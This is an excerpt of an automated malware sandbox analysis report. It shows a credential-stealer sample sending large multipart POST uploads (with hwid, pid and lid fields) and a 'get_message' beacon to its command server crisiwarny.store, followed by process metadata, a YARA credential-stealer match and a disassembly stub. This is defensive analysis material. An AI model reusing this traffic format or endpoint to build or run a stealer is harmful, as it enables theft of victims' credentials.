                                                                                                          vary: accept-encoding
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G2K5r9CqaIMAUmF8dnp%2FZgbhc7W2GYfF4182MvOgFZ5Nk749i0uSWaSBfhYXFgeeHIlUyrN8cg1G%2BA8LBXX0FGGM9PbXRkpka4r06xtKfsNhTiIr7sGL2PiFobBjQGv6S9Me"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8d928a8a2946e5b1-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1316&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2188&delivery_rate=2212375&cwnd=231&unsent_bytes=0&cid=bc46450d69b7fe21&ts=1534&x=0"
                                                                                                          2024-10-27 12:03:09 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
                                                                                                          Data Ascii: 11ok 173.254.250.90
                                                                                                          2024-10-27 12:03:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.449736172.67.170.644437472C:\Users\user\Desktop\file.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-27 12:03:11 UTC283OUTPOST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 568249
                                                                                                          Host: crisiwarny.store
                                                                                                          2024-10-27 12:03:11 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 45 46 31 34 43 32 30 46 42 42 34 37 35 34 41 42 35 35 37 39 37 30 35 33 45 45 35 46 36 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7EF14C20FBB4754AB55797053EE5F66C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                          2024-10-27 12:03:11 UTC15331OUTData Raw: 07 e8 ee 48 58 10 ed e7 2c 8c 62 7c 9d 7d 3c fe 34 fc 50 51 cf cb 2e df 5f 7d c5 ee 33 1d f1 15 18 90 62 4e 00 7c 1b 3c 8b 79 f8 8d 9d 47 f9 66 23 0e 7f 83 c5 19 97 ff cf 08 20 0f a9 c0 23 bf 0d c1 fd 20 ce 90 9a eb 07 98 b9 7c e0 34 1c 10 19 82 e3 1e 95 ad 75 f0 9b d9 8f d9 50 0c 59 29 e6 45 f9 d2 67 d7 52 7e e7 4d b5 8c 40 d0 5e be 3d 67 ad 0f b4 b6 5d f2 7e 1e e7 f5 bc 5a c4 d3 03 47 68 13 6f 8e d6 68 e0 72 dc 6b 92 d5 f2 2f ff c0 0f 84 49 a2 5b ef 53 98 8b ec 99 2f 7f 6d 6b c7 52 ca e3 14 cc f3 be e1 ce 68 a6 37 fa 28 83 ce 27 f4 c0 f7 ca b5 4a 22 61 6c 33 e7 dd a5 41 ab a6 9d fc 1e 34 e5 64 88 49 ca f2 d5 f6 c5 bf c5 70 44 82 ea 4d c4 c2 84 c4 6d cd e8 51 53 b9 ac fe 30 44 de e4 f2 75 b0 cd f9 6e 69 ff 55 be ba 8f 3f 07 24 2d 8d 30 27 4e 3b ef 7a 92
                                                                                                          Data Ascii: HX,b|}<4PQ._}3bN|<yGf# # |4uPY)EgR~M@^=g]~ZGhohrk/I[S/mkRh7('J"al3A4dIpDMmQS0DuniU?$-0'N;z
                                                                                                          2024-10-27 12:03:11 UTC15331OUTData Raw: dd dd b2 87 96 a5 94 dc ea ae aa 72 f7 e8 67 c5 e3 32 9a 2e 9b c6 1f b5 b1 81 97 0b bb 83 93 f0 c1 5e a2 e5 0e 5f e9 f5 5f fd af bf b5 a9 72 8f a8 a9 29 94 04 43 c5 21 a6 10 63 36 17 0f b6 ed f8 57 8b a5 d6 45 20 06 e9 bf 23 d7 e7 5f 82 a4 99 ff 0e b1 ce cd d6 f0 06 34 12 12 40 9c 22 ff 5f 83 a6 a5 fa fb 44 4d 20 02 0e 63 78 27 f7 ec ee 03 d2 fb 69 aa 08 1c 5f bf be 4f b6 51 26 19 aa 5e dd 59 d7 2f 57 29 05 16 1b 6f 40 be a2 cf d2 8f ab 89 b6 7f 44 5f c9 be cf db f3 17 50 04 e3 ea 09 3f 8f ff 69 2b 88 ac 43 0e b4 78 eb 0f 82 14 5c 66 8c 4f 8f 42 b4 70 74 00 7c 6c 41 a5 88 23 bf ae ab e1 89 bb 6a c0 24 ec 26 3c e0 04 11 c1 87 a9 88 d7 a4 02 2d 8f dc bd 0d 3a 5b f2 a7 48 c5 f3 b5 6b f8 52 93 f4 9e 54 c4 48 09 99 cb 84 95 80 bd 03 2c 62 e2 3e 92 37 a7 80 19
                                                                                                          Data Ascii: rg2.^__r)C!c6WE #_4@"_DM cx'i_OQ&^Y/W)o@D_P?i+Cx\fOBpt|lA#j$&<-:[HkRTH,b>7
                                                                                                          2024-10-27 12:03:11 UTC15331OUTData Raw: c1 44 ed e3 8e 7d f7 2d fa 25 9a 09 02 d1 bb ff f3 c1 7b 59 f6 e7 ca f6 8f 95 15 2f 6b 32 91 38 44 b8 85 be 7d 9c 7c 23 37 0d d0 d5 88 54 1a 9a cc 8f e2 55 02 1e 58 ec fa 31 0d 4b 15 bc 53 8e 09 16 3c 85 c2 11 07 b8 86 07 07 71 1e 25 2a 2f 66 d9 0f 4d 3e f2 c0 ce 93 6f df bc fe 43 d7 cd 72 7e 08 3d d2 79 71 0e 10 af 40 44 85 a1 7c 14 70 6d 2b 78 f2 04 2e 05 f5 fa ff 9d 5a 6b 73 c1 5a bd 7d bf de a0 6d 17 ae 5f 8f 45 de 99 ad f6 e5 35 2b 3e e5 56 ed 85 f1 e2 5d 91 5f 28 ce 12 f5 b3 f4 6a 08 48 c4 41 6e 93 7b d7 ad 78 02 e4 81 f3 f7 39 52 44 0d 6e 28 ae 14 b5 2b 6f 97 1e f6 bb 84 c0 6b 34 bd 53 80 ac cb 52 5f 11 b2 a8 25 a5 8a e2 44 c0 1b 51 75 4b 90 d9 10 e2 0a 08 43 05 73 c3 72 62 23 d5 5a cf 18 fa 42 ea ff 44 bc 38 44 6a 01 98 45 34 3b 4e 0f b5 13 1c 5c
                                                                                                          Data Ascii: D}-%{Y/k28D}|#7TUX1KS<q%*/fM>oCr~=yq@D|pm+x.ZksZ}m_E5+>V]_(jHAn{x9RDn(+ok4SR_%DQuKCsrb#ZBD8DjE4;N\
                                                                                                          2024-10-27 12:03:11 UTC15331OUTData Raw: 9d 7f f2 85 35 49 97 83 63 81 45 c0 9d 48 2f d1 d0 e4 26 65 26 23 a6 91 55 f2 c0 65 be fc d2 03 09 4e 21 a8 7f 04 13 f1 cd 23 42 28 e3 0a 0e e0 10 78 f6 4a 60 56 9f 5b 11 08 84 36 42 0b 19 fe 30 a8 1f 1a 19 19 08 87 f9 ad 6b f4 f2 33 2c 9a 1a 03 e9 e6 b4 df 27 c8 a6 47 8f 87 67 44 68 57 70 55 bc 11 0a ab 6f 95 ac c9 56 01 67 26 e5 21 a2 1b df f2 00 12 8f 08 94 be e5 6b e2 af 61 d8 16 a9 b9 56 e9 73 93 34 d1 7c 40 52 78 c2 c9 58 9f 3b 85 39 33 79 71 ff 7a ee 90 3a 66 38 f0 d1 e0 70 f0 b1 05 e5 ee 22 46 ab b6 98 9d b6 54 f3 42 30 e3 da 71 b2 d8 fa 6b 4d db 61 f9 d6 45 49 fb fa 30 0d d1 b6 72 4e 18 37 45 50 60 24 08 03 82 31 30 c6 36 e8 df 25 40 1f 59 30 12 03 b6 d1 b4 aa 73 c5 4e 31 98 70 44 ba 45 88 be 97 5d 33 f5 93 d0 b8 54 c1 eb 9c b7 f1 68 fb f3 02 cc
                                                                                                          Data Ascii: 5IcEH/&e&#UeN!#B(xJ`V[6B0k3,'GgDhWpUoVg&!kaVs4|@RxX;93yqz:f8p"FTB0qkMaEI0rN7EP`$106%@Y0sN1pDE]3Th
                                                                                                          2024-10-27 12:03:11 UTC15331OUTData Raw: fd b7 6d b1 2b a0 92 6b b3 1e f5 d2 22 50 72 2c ee 32 b8 3a 9a 88 6a 25 5d 3c 3d 99 a5 81 87 e6 62 c6 ad 73 eb 22 78 2e 61 29 6c ad 0b 74 73 08 09 cf 48 7e 7c 25 de 17 49 35 40 60 8d 54 fc ba 65 c8 fc ea b2 6e c1 18 52 02 11 aa fd 7c 02 c4 70 4f 17 64 92 ce c3 c8 e7 bb 70 b0 cb a3 7a c0 4c c5 47 96 b7 9b 1c 24 9d 03 ec f7 b3 c5 59 4b 20 b5 8d 52 b1 16 38 0b 4e 83 29 77 45 31 a0 79 c5 94 ba 03 36 06 b5 32 2b 07 1e 28 df dd 1c d0 c5 10 51 15 6a 32 ee 79 bd 08 93 4d 19 63 dd 2a 3b 0b e4 ff a0 80 39 69 d3 9a 36 52 d0 be eb 08 0f da 1c 94 50 09 d1 26 0c cd 71 c0 30 1e 6e 41 02 cb 47 70 97 28 d8 5d b6 2c 4c 6f 37 ee 15 07 65 9b b7 f7 06 a0 80 06 fb 89 26 a2 b2 50 ab 88 10 3d a7 53 92 01 f5 1d 1c 2f 56 05 a7 19 ee 1f 36 d6 0f 3b 0e 6e 34 7d 48 39 3c ce 7e 54 99
                                                                                                          Data Ascii: m+k"Pr,2:j%]<=bs"x.a)ltsH~|%I5@`TenR|pOdpzLG$YK R8N)wE1y62+(Qj2yMc*;9i6RP&q0nAGp(],Lo7e&P=S/V6;n4}H9<~T
                                                                                                          2024-10-27 12:03:11 UTC15331OUTData Raw: 9a 1f 71 c7 8f c9 16 1d 7a 2b 0d 7c d3 ab 2d 61 4b 52 eb 01 41 8e 17 a2 e0 e7 e2 68 39 a8 5a a3 b7 59 52 71 3b d3 9b 16 5b 64 e1 47 13 2e 30 a5 0d db 14 c1 1d 94 04 87 e6 1e 02 d2 cd a9 69 bb a7 6f 5d ae 3b ae 28 53 de a8 ab 01 ba 79 82 f0 3b 8f d1 d3 68 fa db 8d 51 cb dc fe de 31 fe ef b6 d0 17 75 c2 75 ce 10 99 91 15 c0 7f cf dc b0 1f 49 5a e4 e7 fb 08 d3 e7 ad c3 f7 14 0c 71 ff c2 f1 8e eb 02 76 8c 32 e2 27 c4 a7 7a 05 d9 b6 80 fd 5d 96 08 34 3a 72 f7 90 f8 19 87 b9 d2 ac 2e 35 54 0d a5 05 ea 93 07 87 3e e2 92 0e 7a 19 6a f7 28 f6 39 96 ed 08 3d 23 4b ea 9b c0 a5 d7 e9 76 7e e5 0c 95 1f 8c 44 5a 8e 61 aa 1e 90 9e b3 7e 5a 5d 69 20 4d e3 f2 b7 6b 0c 8f 20 99 24 0a 2b dc 03 a1 dd 44 85 50 44 14 38 31 28 76 eb ae c5 f8 51 91 43 e2 47 57 9f cd 37 84 2a 90
                                                                                                          Data Ascii: qz+|-aKRAh9ZYRq;[dG.0io];(Sy;hQ1uuIZqv2'z]4:r.5T>zj(9=#Kv~DZa~Z]i Mk $+DPD81(vQCGW7*
                                                                                                          2024-10-27 12:03:11 UTC15331OUTData Raw: a2 67 18 cc a4 cf d4 41 29 48 65 86 b9 e2 52 fb 05 3d 7d 15 45 95 fb ca cf 90 36 c8 3e 83 e1 18 19 dd fe 13 61 f4 5a d7 47 66 3b 19 44 01 50 5e 3a 5e 5e 6e e0 15 07 f0 c1 0b da f5 e1 d2 8e 7e 9c a9 8c cb 80 d0 ef 17 9c ee 66 fc 59 b7 bd ae dd a8 78 3d 43 85 2b 73 8e a4 bf 65 6f b9 a8 75 95 c6 0d fe 10 2c ba d5 ca e5 3b c7 d6 8e 99 43 52 32 2b 55 36 ed d9 e9 93 b6 de 57 81 3e 2d fd 68 46 6b 68 3e 4d 9d 9b 10 bc 2b 7d ca 06 8e 83 ff a6 f4 7f eb 19 bc 69 08 08 05 50 0f 5e d2 d8 86 23 1c ec fc 6d 6d fc 03 3d 3b 68 e3 75 41 d0 d6 d8 49 4e 15 f3 e0 0e f2 b1 fc 2e 36 a7 d7 58 20 46 29 73 f0 bd 1c d0 3a 42 bb fe 39 2d 57 b1 e5 76 80 f6 e3 f0 cf 77 8c 6f 69 81 e9 92 a8 06 44 a5 f7 89 23 41 98 28 6b 01 70 0b 85 e6 5d 3a e5 4c 98 14 1d 76 95 92 d9 55 97 ef d5 2d f5
                                                                                                          Data Ascii: gA)HeR=}E6>aZGf;DP^:^^n~fYx=C+seou,;CR2+U6W>-hFkh>M+}iP^#mm=;huAIN.6X F)s:B9-WvwoiD#A(kp]:LvU-
                                                                                                          2024-10-27 12:03:11 UTC15331OUTData Raw: 6b aa d0 71 28 19 d6 b9 b5 64 04 7c 61 35 0b e0 e7 2d 15 68 aa ba 08 88 7d d6 17 f0 54 44 a9 4b 05 42 63 cf 3b 56 bd 2c ee b0 21 5c df 42 dc 73 90 3b e6 0b ea d5 19 7d 0b 31 eb 61 30 0d 0e bd b0 18 ae d2 07 1f 96 6d 99 a0 52 b1 b3 fe 34 54 18 0e 92 44 9d 5f ad d4 39 12 26 b3 35 1a 58 36 c0 ad d1 1d 49 24 74 b4 21 2e f5 16 fa f1 5d 14 02 49 6d 26 8d b7 d7 8d 9d 9a 02 53 65 f6 14 a3 cc ee 59 08 6f 48 ac ee 95 7e 57 40 f4 12 15 d6 b2 ea 0b 8b 0a 9b c4 bd 33 6f c3 1c 71 d3 ba 82 39 0f c5 2e 5e 71 89 30 e6 55 e9 77 b3 f4 32 1d cd 25 f8 73 fb 61 84 c7 74 72 3c a3 bb 7e b3 76 ef 04 cf b1 2b a6 c2 a8 50 ea fa cc 10 7d 37 ac 34 cb ab 53 8a 2d 4b 9f 76 d3 ce 00 38 2a cc 6c cd 1b be ae 37 91 1d 10 bf 69 a5 db 9e cd 90 e2 5c 35 a0 5e 6b 23 74 f5 b0 3d 8e 62 75 15 2e
                                                                                                          Data Ascii: kq(d|a5-h}TDKBc;V,!\Bs;}1a0mR4TD_9&5X6I$t!.]Im&SeYoH~W@3oq9.^q0Uw2%satr<~v+P}74S-Kv8*l7i\5^k#t=bu.
                                                                                                          2024-10-27 12:03:11 UTC15331OUTData Raw: 6c e5 ff 5d e8 78 bd eb 1b 89 5a 7f 35 b7 de 9e 0f e8 88 16 7c 63 bc 3c 38 22 07 de c9 e8 21 c1 d3 3e d1 74 f3 90 1f db 2d fb 93 4d ae 6e fd 78 26 ac 01 4e ae db a9 f3 7f 06 38 ae 56 c2 12 71 85 bc 40 67 ed b6 d7 ad bb ce 47 a9 3f 90 68 bf da 5b ef 92 e4 c0 6f b9 53 ba b8 e7 75 e2 10 8e ab 12 50 25 7d f3 a3 4a c2 5b 0c d1 b6 06 85 1d 54 de 8d 3e b6 d7 08 76 84 64 ab c0 e1 fa eb 69 61 6e 2a 8d bb 4d 78 4f 8f be eb c4 e7 45 0d c5 cc 5f 35 4b eb 10 bf 45 14 fa ec 40 ed 4a 0e 1d b8 23 b7 61 7f 6d ed a3 08 9e fb 82 2e 4a c3 18 1e 12 54 52 4c b0 cc 16 7c 7d 54 eb 53 f4 9b 4d f6 91 62 0f 28 db c9 4b 5d da 8b 4a 71 c1 ce 8d 17 0b df 75 6e 8e e4 65 61 38 6e 66 d2 d3 18 08 37 e7 da 8c 1d 5f 7b 5b 13 7d 04 ab df ca ed 74 32 50 5c ab 8d 23 55 f1 e1 13 83 35 f4 da c4
                                                                                                          Data Ascii: l]xZ5|c<8"!>t-Mnx&N8Vq@gG?h[oSuP%}J[T>vdian*MxOE_5KE@J#am.JTRL|}TSMb(K]Jqunea8nf7_{[}t2P\#U5
                                                                                                          2024-10-27 12:03:38 UTC1018INHTTP/1.1 200 OK
                                                                                                          Date: Sun, 27 Oct 2024 12:03:38 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=sk3es93aolfv2slc7jfv08i115; expires=Thu, 20 Feb 2025 05:49:53 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          vary: accept-encoding
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S76OiR0Bx47UqKCXwGyNcPua3gWJbGdGI%2Bl3S22%2FAqX4T%2BOTNJQFXFDmLUI9DddTqohat6WXLoCtp1jgJ56RgDVCKzkqYCezdZHe4ItX0VlXutRt5O0JRuM%2FHCixsAGSCwrM"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8d928a9afd194683-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1146&sent=220&recv=613&lost=0&retrans=0&sent_bytes=2837&recv_bytes=570796&delivery_rate=2496551&cwnd=251&unsent_bytes=0&cid=a24563946e4833b8&ts=27156&x=0"


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.449701172.67.170.644437472C:\Users\user\Desktop\file.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-27 12:03:38 UTC264OUTPOST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 87
                                                                                                          Host: crisiwarny.store
                                                                                                          2024-10-27 12:03:38 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d 26 68 77 69 64 3d 37 45 46 31 34 43 32 30 46 42 42 34 37 35 34 41 42 35 35 37 39 37 30 35 33 45 45 35 46 36 36 43
                                                                                                          Data Ascii: act=get_message&ver=4.0&lid=4SD0y4--legendaryy&j=&hwid=7EF14C20FBB4754AB55797053EE5F66C
                                                                                                          2024-10-27 12:03:39 UTC1003INHTTP/1.1 200 OK
                                                                                                          Date: Sun, 27 Oct 2024 12:03:39 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=7tc8pkcie1tt7r8mb1h32h2i41; expires=Thu, 20 Feb 2025 05:50:18 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          vary: accept-encoding
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lnWCpbV70MJzvzAFfNcoI3Bx7j4Jbm1RRvtCLsLASPbzlan8LXVGdaqFjg2htEmQT6CpdfhAwjRU4RQOKs83WHTpDZcq0DeDE%2BDbsLYm8dwhVOhEIOSn89Cjl79tX4Alyp1g"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8d928b48eab30b82-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1578&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=987&delivery_rate=1819095&cwnd=251&unsent_bytes=0&cid=a10b6eda5abf6bf4&ts=525&x=0"
                                                                                                          2024-10-27 12:03:39 UTC130INData Raw: 37 63 0d 0a 49 6a 66 4b 2f 77 2f 6d 32 44 4a 79 71 31 30 38 78 59 78 56 6d 61 4a 6c 4a 6c 6e 45 54 39 57 56 33 4e 30 75 32 45 34 63 4c 62 4a 35 54 4f 69 4b 4c 64 7a 36 57 67 62 66 4c 51 61 5a 6f 77 6d 32 6b 31 30 54 64 2f 5a 2b 34 4c 76 74 37 42 33 32 66 79 70 78 6e 55 31 52 72 4b 4d 67 67 72 31 55 58 4d 34 6c 57 65 65 67 64 2f 2f 57 52 78 78 70 36 47 32 77 74 2b 62 74 55 34 55 3d 0d 0a
                                                                                                          Data Ascii: 7cIjfK/w/m2DJyq108xYxVmaJlJlnET9WV3N0u2E4cLbJ5TOiKLdz6WgbfLQaZowm2k10Td/Z+4Lvt7B32fypxnU1RrKMggr1UXM4lWeegd//WRxxp6G2wt+btU4U=
                                                                                                          2024-10-27 12:03:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Target ID:0
                                                                                                          Start time:08:02:58
                                                                                                          Start date:27/10/2024
                                                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                          Imagebase:0x840000
                                                                                                          File size:2'921'984 bytes
                                                                                                          MD5 hash:5C0022DD6F83870F6A81FAF362383AE3
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1711943208.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Disassembly

                                                                                                          Reset < >

                                                                                                            Non-executed Functions

                                                                                                            Function 006F697C Relevance: .1, Instructions: 68COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000003.2085694944.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, Offset: 006F4000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_3_6f2000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ac487c774bc5449ac42e4d8143fd7521ea923bb81e0e38de28b5b1a7358d4b45
                                                                                                            • Instruction ID: 6a8940c5955fe289d9caa18d3b1f4bb57af20e7ef437cf8330d7aaf34ee41558
                                                                                                            • Opcode Fuzzy Hash: ac487c774bc5449ac42e4d8143fd7521ea923bb81e0e38de28b5b1a7358d4b45
                                                                                                            • Instruction Fuzzy Hash: 4721FF7205A3C1AFCB52DF38C9D1A833F61AF4732474A82D8E4805E047D328A623CB92